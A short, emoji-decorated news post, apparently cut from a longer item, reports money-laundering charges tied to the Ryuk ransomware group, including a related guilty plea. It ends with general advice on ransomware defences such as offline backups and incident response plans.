🕵️ She is also accused of assisting the Ryuk ransomware group by laundering more than $2.3 million in suspected victim payments in 2021. Ryuk, a precursor to the Conti ransomware, has targeted governments, healthcare providers and others since 2018.

👮‍♂️ In a related case, a Russian citizen named Denis Mihaqlovic Dubnikov pleaded guilty earlier this year to money laundering charges connected to Ryuk ransomware attacks.

💼 As ransomware attacks continue to rise, organisations are urged to adopt comprehensive defences, including robust offline backups, security software, user training and a rehearsed incident response plan. 🛡️🌍💸🔍

Don't get caught with your pants down, folks; ransomware is the cyber-scourge of our time. Stay safe out there, true believers ✊

